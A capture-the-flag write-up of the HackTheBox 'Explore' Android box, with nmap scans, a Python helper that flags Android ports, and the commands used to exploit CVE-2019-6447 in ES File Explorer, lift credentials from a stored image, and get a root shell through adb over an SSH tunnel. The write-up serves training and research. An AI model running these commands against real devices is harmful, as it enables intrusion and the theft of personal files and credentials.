HackTheBox - Explore
This was classified as an easy box by bertolis on HackTheBox and was my first experience with Android exploitation. Enumerating the open ports, we discover SSH, Android Debug Bridge (adb), and ES File Explorer, which is vulnerable to CVE-2019-6447 and will be our method to gain a foothold. For privilege escalation, we will set up an SSH tunnel to execute adb commands and gain root.
Phase 1 - Enumeration
We first run a network scan to enumerate open ports.
PORT     STATE    SERVICE VERSION
2222/tcp open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.91%I=7%D=10/25%Time=6176573F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
From the results above, we see that SSH is open on port 2222 and its banner states that it is “Banana Studio.” A quick Google search reveals that Banana Studio is an SSH server for Android operating systems.
Since we are not sure whether the previous nmap command shows all open ports, we also run a full port scan on the target with the following:
sudo nmap -p- 10.10.10.247
PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
42135/tcp open     unknown
45225/tcp open     unknown
59777/tcp open     unknown
Seeing the ports that were listening (2222, 5555, 42135, 45225, 59777), we did some research on common uses of those ports on Android operating systems. Information I found included:
- 2222: SimpleSSH
- 5555: Android Debug Bridge (ADB)
- 59777: ES File Explorer
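As an added example (not part of the original writeup), a small Python helper that parses nmap's normal output like the scans above and flags the Android-specific services from the list by port number, since nmap's own service guesses (EtherNetIP-1, freeciv) are wrong here. The sample output and the mitigation notes in ANDROID_PORTS are constructed for this example; it deliberately keeps ports nmap reports as filtered, because a service hidden from the outside can still be listening on the device.

```python
import re
from dataclasses import dataclass

# Constructed sample in nmap's normal output format, mirroring the full port
# scan shown above (nmap's service guesses for an Android host are unreliable).
SAMPLE_NMAP = """\
PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
42135/tcp open     unknown
45225/tcp open     unknown
59777/tcp open     unknown
"""

# Ports the writeup identifies on Android targets, keyed by number rather than
# by nmap's service name, each with a defender's note (notes are ours).
ANDROID_PORTS = {
    2222: ("SSH server app (SimpleSSH / Banana Studio)",
           "password SSH on a phone: rotate any credentials stored on the device"),
    5555: ("Android Debug Bridge over TCP",
           "adb over TCP exposes a device shell: switch to USB-only (adb usb) and block the port"),
    59777: ("ES File Explorer HTTP service",
            "CVE-2019-6447, unauthenticated file read/app launch: remove or update the app"),
}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.MULTILINE)

@dataclass
class Finding:
    port: int
    state: str     # nmap state: open, filtered, closed
    service: str   # what the port really is on Android
    note: str      # mitigation hint

def parse_ports(nmap_text: str):
    """Extract (port, proto, state, nmap_service) tuples from nmap normal output."""
    return [(int(p), proto, state, svc)
            for p, proto, state, svc in PORT_LINE.findall(nmap_text)]

def assess(nmap_text: str):
    """Flag Android-specific services. 'filtered' ports are kept on purpose:
    a firewall drops outside probes, but the service may still listen on the
    device and become reachable after a foothold, as adb on 5555 does here."""
    findings = []
    for port, _proto, state, _svc in parse_ports(nmap_text):
        if port in ANDROID_PORTS and state != "closed":
            name, note = ANDROID_PORTS[port]
            findings.append(Finding(port, state, name, note))
    return findings
```

Running assess(SAMPLE_NMAP) on the sample reports 2222, 5555 and 59777, with 5555 carrying the filtered state that the external scan showed.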
Phase 2 - Exploitation
Doing some research on each port, we find that port 59777 belongs to ES File Explorer, which has a vulnerability that allows remote attackers on the local network to read arbitrary files or execute applications via requests to TCP port 59777.
Looking in ExploitDB, we find a proof-of-concept Python exploit script for CVE-2019-6447.
Running the Python script with the following command lists the pictures stored on the device:
python3 exploit.py listPics 10.10.10.247
Let’s download creds.jpg with the following command.
python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
And open the image.
The image gives us some credentials, so we try to log in to the SSH server running on the Android device with the following command:
ssh [email protected] -p 2222
And we get in, gaining our foothold! user.txt can be found in sdcard/user.txt.
Phase 3 - Privilege Escalation
Since we have access to the device through SSH, and we know that there is an ADB service running on port 5555, we can execute commands with ADB.
In order to run ADB commands against the device, we first set up SSH local port forwarding with the following command:
ssh [email protected] -p 2222 -L 5555:localhost:5555
Android Debug Bridge (adb)
ADB commands help: the official documentation for adb commands.
We run the following commands through the forwarded port to connect to the device and gain a shell, which already runs as root.
# to establish a connection
adb connect 127.0.0.1:5555
# to list connected devices
adb devices
# to open an interactive shell on the specified device
adb -s 127.0.0.1:5555 shell
And we are root! root.txt can be found in /data/root.txt.